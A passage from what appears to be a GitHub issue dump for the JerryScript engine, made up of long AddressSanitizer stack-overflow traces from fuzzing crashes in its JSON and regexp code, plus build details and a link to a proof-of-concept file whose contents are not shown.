#90 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#91 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#92 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#93 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#94 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#95 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#96 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#97 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#98 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#99 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#100 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#101 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#102 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#103 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#104 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#105 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#106 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#107 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#108 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#109 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#110 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#111 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#112 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#113 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#114 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#115 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#116 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#117 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#118 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#119 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#120 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#121 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#122 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#123 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#124 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#125 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#126 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#127 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#128 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#129 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#130 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#131 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#132 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#133 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#134 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#135 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#136 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#137 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#138 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#139 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#140 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#141 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#142 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#143 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#144 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#145 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#146 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#147 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#148 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#149 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#150 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#151 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#152 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#153 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#154 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#155 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#156 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#157 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#158 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#159 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#160 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#161 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#162 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#163 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#164 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#165 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#166 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#167 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#168 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#169 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#170 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#171 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#172 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#173 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#174 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#175 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#176 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#177 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#178 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#179 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#180 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#181 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#182 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#183 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#184 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#185 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#186 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#187 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#188 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#189 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#190 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#191 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#192 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#193 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#194 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#195 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#196 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#197 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#198 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#199 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#200 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#201 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#202 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#203 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#204 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#205 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#206 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#207 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#208 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#209 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#210 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#211 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#212 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#213 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#214 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#215 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#216 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#217 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#218 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#219 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#220 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#221 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#222 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#223 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#224 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#225 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#226 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#227 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#228 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#229 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#230 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#231 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#232 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#233 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#234 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#235 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#236 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#237 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#238 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#239 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#240 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#241 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#242 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#243 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#244 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#245 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#246 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#247 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#248 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#249 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#250 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#251 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
SUMMARY: AddressSanitizer: stack-overflow /home/keven/Fuzzing/jerry-test/jerry-core/ecma/base/ecma-helpers.c:177 ecma_is_lexical_environment
==62415==ABORTING | Stack overflow at ecma_is_lexical_environment jerry-core/ecma/base/ecma-helpers.c:177 | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4303/comments | 1 | 2020-10-20T07:01:02Z | 2020-10-22T08:34:00Z | https://github.com/jerryscript-project/jerryscript/issues/4303 | 725,268,945 | 4,303 |
[
"jerryscript-project",
"jerryscript"
]
| # Build environment:
Ubuntu 16.04
gcc 5.4.0
jerry version: 6f25d6e
build command: python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --lto=off --error-message=on --system-allocator=on
test command: ./xst poc
# Target device:
Desktop Linux
# POC
[jerry-001439.txt](https://github.com/jerryscript-project/jerryscript/files/5406811/jerry-001439.txt)
# Description
Below is the ASAN outputs.
ASAN:SIGSEGV
=================================================================
==123642==ERROR: AddressSanitizer: stack-overflow on address 0xff407ffc (pc 0x081a87b8 bp 0xff408038 sp 0xff408000 T0)
#0 0x81a87b7 in re_decode_u32 /home/keven/Fuzzing/jerry-test/jerry-core/parser/regexp/re-bytecode.c:187
#1 0x81aa4f9 in re_get_value /home/keven/Fuzzing/jerry-test/jerry-core/parser/regexp/re-bytecode.c:266
#2 0x8140d50 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:803
#3 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#4 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#5 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#6 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#7 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#8 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#9 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#10 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#11 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#12 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#13 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#14 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#15 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#16 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#17 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#18 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#19 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#20 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#21 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#22 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#23 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#24 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#25 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#26 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#27 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
